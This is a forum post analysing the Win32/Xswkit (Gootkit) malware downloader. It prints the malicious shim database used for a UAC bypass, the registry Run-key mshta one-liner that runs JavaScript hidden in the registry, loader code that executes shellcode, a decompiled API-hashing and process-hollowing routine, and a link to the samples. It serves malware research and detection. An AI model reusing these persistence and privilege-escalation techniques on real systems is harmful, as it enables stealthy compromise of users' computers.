Jump to content
Aerosol

Win32/Xswkit (alias Gootkit)

By Aerosol, in Reverse engineering & exploit development

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted

Credits for sample to Tigzy and R136a1, preliminary analysis done by R136a1.

Win32/Xswkit is another clone of Win32/Poweliks but with number of additions, such as embedded UAC bypass and different startup method (rundll + mshta.exe). Purpose: malware downloader.

Update 04/01/2015

See viewtopic.php?p=24827#p24827

UAC bypass is similar to used by Gootkit, reconstructed can be found -> here.

During installation Xswkit builds shim database patch, drops it to %temp% folder and executes sdbinst with -q parameter and path to new database. Entry itself is shim RedirectEXE

<DATABASE tid="0xf0" typ="LIST">
  <TIME tid="0xf6" typ="QWORD">0x1d014b31a06ce99</TIME>
  <COMPILER_VERSION tid="0x100" typ="STRINGREF">2.1.0.3</COMPILER_VERSION>
  <NAME tid="0x106" typ="STRINGREF">qrywI9lBMKdLH</NAME>
  <OS_PLATFORM tid="0x10c" typ="DWORD">0x1</OS_PLATFORM>
  <DATABASE_ID tid="0x112" typ="BINARY" len="0x10" guid="1AC61212-7AC0-464A-8B9815BC2854072E" />
  <LIBRARY tid="0x128" typ="LIST">
  </LIBRARY>
  <EXE tid="0x12e" typ="LIST">
   <NAME tid="0x134" typ="STRINGREF">cliconfg.exe</NAME>
   <APP_NAME tid="0x13a" typ="STRINGREF">nv0NK43fWQ</APP_NAME>
   <VENDOR tid="0x140" typ="STRINGREF">Microsoft</VENDOR>
   <EXE_ID tid="0x146" typ="BINARY" len="0x10" guid="E6D3E2BF-6CBF-0C43-B41AA519B962860C" />
   <MATCHING_FILE tid="0x15c" typ="LIST">
    <NAME tid="0x162" typ="STRINGREF">*</NAME>
    <COMPANY_NAME tid="0x168" typ="STRINGREF">Microsoft Corporation</COMPANY_NAME>
    <INTERNAL_NAME tid="0x16e" typ="STRINGREF">cliconfg.exe</INTERNAL_NAME>
   </MATCHING_FILE>
   <SHIM_REF tid="0x174" typ="LIST">
    <NAME tid="0x17a" typ="STRINGREF">RedirectEXE</NAME>
    <COMMAND_LINE tid="0x180" typ="STRINGREF">"C:\Malware\1.exe" -z "C:\Users\UserMan\AppData\Local\Temp\AF293.tmp"</COMMAND_LINE>
   </SHIM_REF>
  </EXE>
 </DATABASE>

B6aPmLyIgAE-UXJ.png

So malware installation steps are following:

1) generate SDB shim patch and drop it to %temp% folder

2) register shim with sdbinst (no UAC prompt on default UAC settings)

3) run target application -> cliconfg.exe, terminate itself

4) cliconfg.exe (no UAC prompt on default UAC settings) executes malicious shim and starts malware dropper again with given commandline arguments

5) dropper installs itself to the system with full admin rights

Below is R136a1 analysis he was so kind to share.

1) Set value in Registry:

Key: HKEY_CURRENT_USER\Software

Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)

2) Create Key and set values in Registry:

Key: HKEY_CURRENT_USER\Software\ xsw

Value: binaryImage32 (REG_BINARY) -> Copy of itself

Value: loader (REG_SZ) -> Javascript code

3) Create new process C:\WINDOWS\system32\svchost.exe (Process hijack)

4) Exit old process

5) Set value in Registry:

Key: HKEY_CURRENT_USER\Software

Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)

6) Create Key and set values in Registry:

Key: HKEY_USERS\.DEFAULT\Software\ xsw

Value: binaryImage32 (REG_BINARY) -> Copy of itself

Value: loader (REG_SZ) -> Javascript code

Set Key in Registry:

Key: HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

Value: rundll32 (REG_SZ)

Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

7) Create Key and set values in Registry:

Key: HKEY_USERS\S-1-5-19\Software\ xsw

Value: binaryImage32 (REG_BINARY) -> Copy of itself

Value: loader (REG_SZ) -> Javascript code

Set Key in Registry:

Key: HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run

Value: rundll32 (REG_SZ)

Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

8) Create Key and set values in Registry:

Key: HKEY_USERS\S-1-5-20\Software\ xsw

Value: binaryImage32 (REG_BINARY) -> Copy of itself

Value: loader (REG_SZ) -> Javascript code

Set Key in Registry:

Key: HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run

Value: rundll32 (REG_SZ)

Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

9) Download and install a lot of root certificates

10) Set values in Registry:

Key: HKEY_CURRENT_USER\Software

Value: binaryImage32_0...binaryImage32_5 (REG_BINARY)

Data: ...

11) Inject code into explorer.exe (+ firefox.exe + iexplore.exe after opening)

??? 12) ESENT.dll loading by injected processes ???

13) Create Key and set values in Registry:

Key: HKEY_CURRENT_USER\Software\cxsw

Value: {c1e2bc64-8d94-461f-a485-50a7322bfb4a} (REG_BINARY)

Data: ...

Value: {da14b39e-535a-4b08-9d68-ba6d14fed630} (REG_BINARY)

Data: ...

More from mutex {a1ba4f72-9762-4864-8889-478ac3bdb354}:

https://www.virustotal.com/en/file/658c180654ebfe962c0032a71a8f2b7849ae010599dd3048d24de8f5ff36f06a/analysis/

https://www.virustotal.com/en/file/2baf2050ba223f03f85db4d595e704a593ccef3497f5685f0f59fb315249a5b8/analysis/

More from registry value {d42d0afb-3638-4326-b67b-b0cb954fba94}:

http://totalhash.com/analysis/efd11b782fb2ab225e2231c563f5860c804ece07

http://totalhash.com/analysis/dded6ea7392d35b14347ea06c4cf8acc5b32bcc5

http://totalhash.com/analysis/0bd288047e646fd32ba08db01d56779f02b2befa

http://totalhash.com/analysis/258fc44bdae12f21dd9bdded1ce22cee5850c9c1

http://www.threatexpert.com/report.aspx?md5=18ada38d7a0466240ea9bde1c1d8b956

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AJEH/detailed-analysis.aspx

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Upatre-FM/detailed-analysis.aspx

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AJCH/detailed-analysis.aspx

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Mdrop-GDB/detailed-analysis.aspx

Malware uses Windows tool mshta.exe and DynamicWrapperX:

http://yuripopov.ucoz.net/index/dwx_regaddr_regcode_en/0-27

Lets continue.

Loader script is very huge (144kb) as it contains copy of mshta.exe, dynwrapx.dll, their manifests and shellcode, everything you will find in attach.

How malware operates after reboot.

It runs from Software\Microsoft\Windows\CurrentVersion\Run key by rundll32 which executes the following 

mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

Hidden window with script that does next loading stage.

Once executed it performs the following piece of code read from loader registry value at previous stage

try {
   var DWX = new ActiveXObject(\"DynamicWrapperX\");
   ExecuteShellCode();
   function ExecuteShellCode(){
      var CodeAddr = DWX.RegisterCode(ShellcodeHexStr, \"executeCode\", \"i=l\", \"r=l\");
      DWX.executeCode(0);
   }

   Exit();

} catch(e) {
   SetupDWX();
}

It attempts to create new ActiveXObject "DynamicWrapperX" which allows code execution, if it failed then it installs this additions in SetupDWX routine.

function SetupDWX()
{
   if (!FileExists(DefaultDir+\"mshta.exe\")) UnpackResource(\"mshta.exe\", DefaultDir +\"mshta.exe\");
   if (!FileExists(DefaultDir+\"dynwrapx.dll\")) UnpackResource(\"dynwrapx.dll\", DefaultDir +\"dynwrapx.dll\");
   if (!FileExists(DefaultDir+\"dynwrapx.sxs.manifest\")) UnpackResource(\"dynwrapx.sxs.manifest\", DefaultDir +\"dynwrapx.sxs.manifest\");
   if (!FileExists(DefaultDir+\"mshta.exe.manifest\")) UnpackResource(\"mshta.exe.manifest\", DefaultDir +\"mshta.exe.manifest\");

   WshShell.Run('\"'+DefaultDir+\"mshta.exe\\\" \\\"\"+HTARunCommand+'\"',0,0);
   Exit();
}

Shellcode section also read from loader registry key and this is a final malware startup stage. Main purpose of it - read actual malware body stored in registry as binaryImageXX value data (where XX is platform -32 or 64), start suspended svchost.exe, unmap it original code, map malicious payload and run it.

Shellcode uses API hashing and global shellcode description structure, dynamically allocated during execution.

Below is API hashing function

unsigned long get_hash(char *s)
{
   unsigned long v1 = 0x1505;

   while (*s != 0) {
      v1 += *(unsigned char *)s + (v1 << 5);
      s++;
   }
   return v1;
}

shell context allocation routine

struct_v23 *__cdecl CreateShellContext()
{
  int hUser32; // eax@4
  int v1; // eax@4
  int v2; // eax@4
  int v4; // [sp+0h] [bp-50h]@1
  int v5; // [sp+4h] [bp-4Ch]@1
  int v6; // [sp+8h] [bp-48h]@1
  int v7; // [sp+Ch] [bp-44h]@1
  int v8; // [sp+10h] [bp-40h]@1
  int v9; // [sp+14h] [bp-3Ch]@1
  int v10; // [sp+18h] [bp-38h]@1
  int szAdvapi32; // [sp+1Ch] [bp-34h]@1
  int v12; // [sp+20h] [bp-30h]@1
  int v13; // [sp+24h] [bp-2Ch]@1
  int v14; // [sp+28h] [bp-28h]@1
  int szNtdll; // [sp+2Ch] [bp-24h]@1
  int v16; // [sp+30h] [bp-20h]@1
  int v17; // [sp+34h] [bp-1Ch]@1
  int szUser32; // [sp+38h] [bp-18h]@1
  int v19; // [sp+3Ch] [bp-14h]@1
  int v20; // [sp+40h] [bp-10h]@1
  int VirtualAlloc; // [sp+44h] [bp-Ch]@2
  int hKernel32; // [sp+48h] [bp-8h]@1
  struct_v23 *shell_ctx; // [sp+4Ch] [bp-4h]@1

  shell_ctx = 0;
  v4 = 'e\0k';
  v5 = 'n\0r';
  v6 = 'l\0e';
  v7 = '2\03';
  v8 = 'd\0.';
  v9 = 'l\0l';
  v10 = 0;
  hKernel32 = GetModuleHandle(&v4);
  szNtdll = 'ldtn';
  v16 = 'ld.l';
  v17 = 'l';
  szAdvapi32 = 'avda';
  v12 = '23ip';
  v13 = 'lld.';
  v14 = 0;
  szUser32 = 'resu';
  v19 = 'd.23';
  v20 = 'll';
  if ( hKernel32 )
  {
    VirtualAlloc = ApiFromHash(hKernel32, 0x382C0F97u);
    if ( VirtualAlloc )
    {
      shell_ctx = (VirtualAlloc)(0, 0xC4u, 0x3000u, 64);
      if ( shell_ctx )
      {
        shell_ctx->hKernel32 = hKernel32;
        shell_ctx->VirtualAlloc = VirtualAlloc;
        shell_ctx->VirtualFree = ApiFromHash(shell_ctx->hKernel32, 0x668FCF2Eu);
        shell_ctx->Sleep = ApiFromHash(shell_ctx->hKernel32, 0xE19E5FEu);
        shell_ctx->LoadLibraryExA = ApiFromHash(shell_ctx->hKernel32, 0x4F803C78u);
        shell_ctx->CreateThread = ApiFromHash(shell_ctx->hKernel32, 0x7F08F451u);
        shell_ctx->lstrlenA = ApiFromHash(shell_ctx->hKernel32, 0xD2C4AB0Au);
        shell_ctx->GetProcAddress = ApiFromHash(shell_ctx->hKernel32, 0xCF31BB1Fu);
        shell_ctx->LocalFree = ApiFromHash(shell_ctx->hKernel32, 0xA66DF372u);
        shell_ctx->CloseHandle = ApiFromHash(shell_ctx->hKernel32, 0x3870CA07u);
        shell_ctx->GetCurrentProcess = ApiFromHash(shell_ctx->hKernel32, 0xCA8D7527u);
        shell_ctx->ExpandEnvironmentStringsW = ApiFromHash(shell_ctx->hKernel32, 0x7487495Bu);
        shell_ctx->CreateProcessW = ApiFromHash(shell_ctx->hKernel32, 0xAEB52E2Fu);
        shell_ctx->GetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0xEBA2CFC2u);
        shell_ctx->ReadProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0xB8932459u);
        shell_ctx->lstrcatW = ApiFromHash(shell_ctx->hKernel32, 0xD2BFAB79u);
        shell_ctx->ResumeThread = ApiFromHash(shell_ctx->hKernel32, 0x74162A6Eu);
        shell_ctx->SetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0x7E20964Eu);
        shell_ctx->VirtualProtectEx = ApiFromHash(shell_ctx->hKernel32, 0xD812922Au);
        shell_ctx->WriteProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0x6F22E8C8u);
        shell_ctx->VirtualAllocEx = ApiFromHash(shell_ctx->hKernel32, 0xF36E5AB4u);
        shell_ctx->hNtdll = shell_ctx->LoadLibraryExA(&szNtdll, 0, 0);
        shell_ctx->RtlCreateHeap = ApiFromHash(shell_ctx->hNtdll, 0xAFAAC189u);
        shell_ctx->RtlAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xC0B381DAu);
        shell_ctx->RtlReAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xBBC97911u);
        shell_ctx->RtlFreeHeap = ApiFromHash(shell_ctx->hNtdll, 0x70BA71D7u);
        shell_ctx->NtTerminateThread = ApiFromHash(shell_ctx->hNtdll, 0xAC3C9DC8u);
        shell_ctx->RtlDecompressBuffer = ApiFromHash(shell_ctx->hNtdll, 0xF73BBD46u);
        shell_ctx->NtOpenKey = ApiFromHash(shell_ctx->hNtdll, 0x4BB73E02u);
        shell_ctx->wcslen = ApiFromHash(shell_ctx->hNtdll, 0x24B549F1u);
        shell_ctx->NtUnmapViewOfSection = ApiFromHash(shell_ctx->hNtdll, 0x595014ADu);
        shell_ctx->hAdvapi32 = shell_ctx->LoadLibraryExA(&szAdvapi32, 0, 0);
        shell_ctx->RegOpenKeyExW = ApiFromHash(shell_ctx->hAdvapi32, 0x74A9772u);
        shell_ctx->ConvertSidToStringSidW = ApiFromHash(shell_ctx->hAdvapi32, 0x99A22DD7u);
        shell_ctx->RegSetValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x345872EAu);
        shell_ctx->RegQueryValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x6B95D114u);
        shell_ctx->RegOpenKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x74A975Cu);
        shell_ctx->RegCreateKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x46CEB39Eu);
        shell_ctx->RegCloseKey = ApiFromHash(shell_ctx->hAdvapi32, 0x736B3702u);
        shell_ctx->RegEnumKeyA = ApiFromHash(shell_ctx->hAdvapi32, 0xF367EA22u);
        shell_ctx->OpenProcessToken = ApiFromHash(shell_ctx->hAdvapi32, 0xC57BD097u);
        shell_ctx->GetTokenInformation = ApiFromHash(shell_ctx->hAdvapi32, 0x8ED47F2Cu);
        shell_ctx->IsValidSid = ApiFromHash(shell_ctx->hAdvapi32, 0x3D180391u);
        hUser32 = (shell_ctx->LoadLibraryExA)(&szUser32, 0, 0);
        shell_ctx->MessageBoxA = ApiFromHash(hUser32, 0x384F14B4u);
        shell_ctx->wsprintfA = ApiFromHash(hUser32, 0xF898B8C3u);
        shell_ctx->wsprintfW = ApiFromHash(hUser32, 0xF898B8D9u);
        shell_ctx->hHeap = shell_ctx->RtlCreateHeap(2, 0, 0, 0, 0);
      }
    }
  }
  return shell_ctx;
}

and svchost spawning code

1zpn0k6.jpg

Strings from actual malware

RtlCreateUserThread NtClose InternetReadFile    HttpOpenRequestA    InternetCloseHandle HttpSendRequestA    InternetOpenA   InternetConnectA    HttpQueryInfoA  InternetQueryOptionA    InternetSetOptionA  InternetSetFilePointer  HttpAddRequestHeadersA  L a s t H a r d w a r e H a s h     b i n a r y I m a g e % d   % s _ % d   \ R E G I S T R Y \ U S E R \ % s   \ R e g i s t r y \ U s e r     % S y s t e m R o o t % \ S y s t e m 3 2 \ n t d l l . d l l   RtlDecompressBuffer ntdll.dll   RtlComputeCrc32 a p p h e l p . d l l   SdbBeginWriteListTag    SdbCloseDatabase    SdbCloseDatabaseWrite   SdbCommitIndexes    SdbCreateDatabase   SdbDeclareIndex SdbEndWriteListTag  SdbFindFirstDWORDIndexedTag SdbFindFirstTag SdbFindNextTag  SdbFormatAttribute  SdbFreeFileAttributes   SdbGetAppPatchDir   SdbGetBinaryTagData SdbGetFileAttributes    SdbGetFirstChild    SdbGetIndex SdbGetMatchingExe   SdbGetNextChild SdbGetStringTagPtr  SdbGetTagFromTagID  SdbInitDatabase SdbIsStandardDatabase   SdbMakeIndexKeyFromString   SdbOpenApphelpDetailsDatabase   SdbOpenApphelpResourceFile  SdbOpenDatabase SdbQueryDataExTagID SdbReadApphelpDetailsData   SdbReadBinaryTag    SdbReadDWORDTag SdbReadQWORDTag SdbReadStringTag    SdbRegisterDatabaseEx   SdbReleaseDatabase  SdbReleaseMatchingExe   SdbStartIndexing    SdbStopIndexing SdbTagRefToTagID    SdbTagToString  SdbUnregisterDatabase   SdbWriteBinaryTag   SdbWriteBinaryTagFromFile   SdbWriteDWORDTag    SdbWriteNULLTag SdbWriteQWORDTag    SdbWriteStringTag   SdbWriteWORDTag ShimFlushCache  BaseFlushAppcompatCache generic unknown error   iostream    iostream stream error   system  2 . 1 . 0 . 3   d?@ °H@ PI@ `I@ ?H@ 0I@ ?H@ ?@ °H@ ?I@ `I@  J@ 0I@ ?H@ ??@ °H@ ?I@  I@ ?H@ 0I@ ?H@ °?@ °H@ 0@ 0@ ?H@ 0I@ ?H@ SHGetKnownFolderPath    Shell32.dll SHGetSpecialFolderPathW     \ R e g i s t r y \ M a c h i n e \ S o f t w a r e \ M i c r o s o f t \ C r y p t o g r a p h y   M a c h i n e G u i d       \ R E G I S T R Y \ U S E R \ % s \ S o f t w a r e \ A p p D a t a L o w   \ R E G I S T R Y \ U S E R \ % s \ S o f t w a r e     \ R E G I S T R Y \ U S E R \ % s \ % s     S e R e s t o r e P r i v i l e g e     d?@ pm@ - z     c l i c o n f g . e x e     s d b i n s t . e x e       a b c d e f g h i j k l m n o p q r s t v u w x y z A B C D E F G H I J K L M N O P Q R S T U V W 0 1 2 3 4 5 6 7 8 9 _         A   S y s W O W 6 4     s y s t e m 3 2     \   M i c r o s o f t   R e d i r e c t E X E   M i c r o s o f t   C o r p o r a t i o n   *   "       "       - q   " % s "   - q   - u   " % s "     r u n a s   IsWow64Process  k e r n e l 3 2 . d l l     explorer.exe    chrome.exe  opera.exe   iexplore.exe    lsass.exe   firefox.exe LoadLibraryExA  kernel32.dll    GetProcAddress  VirtualProtect  VirtualAlloc    CreateThread    VirtualQuery    ZwOpenProcess   % S y s t e m R o o t % \ S y s t e m 3 2 \     b i n a r y I m a g e 3 2   l o a d e r     { d 4 2 d 0 a f b - 3 6 3 8 - 4 3 2 6 - b 6 7 b - b 0 c b 9 5 4 f b a 9 4 }     w i n d i r     % s \ s y s t e m 3 2 \ c m d . e x e     / c   " s t a r t   % s "     d e s k t o p . i n i   { 2 7 3 b 5 8 8 4 - 3 6 2 d - 4 f f 7 - 8 d 6 5 - 6 4 a c 2 e 7 f c 2 9 1 }     \ h u i     % s \ h u i % d . e x e     { a 1 b a 4 f 7 2 - 9 7 6 2 - 4 8 6 4 - 8 8 8 9 - 4 7 8 a c 3 b d b 3 5 4 }     \ s v c h o s t . e x e     s v c h o s t . e x e                   @      @   LdrGetProcedureAddress  NtAllocateVirtualMemory NtFreeVirtualMemory NtWriteVirtualMemory    H                                                      F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb

No actual name except

F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb

I'm curious when they realize that /DEBUG option should be turned off in release builds.

Original dropper, unpacked malware, full loader text and extracted shellcode in attach.

VT

original

https://www.virustotal.com/en/file/ed3d622c54b474c6caef540a3147731a1b2c7d4a7563b97731880bb15305d47d/analysis/1420287664/

unpacked

https://www.virustotal.com/en/file/c3885c394a3ad75bc53e7ef2b2d8c8e9e5a12a7f3a52c7399d63814f05c52c96/analysis/1420287667/

No actual detection only trash.

P.S.

+ actual loading screenshot, as you can see Sysinternals Autoruns cannot recognize this entry as rogue, more to say if you select Verify Digital Signatures it will list it as totally legit.

s4oy20.jpg

MALWARE

Pass: infected

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...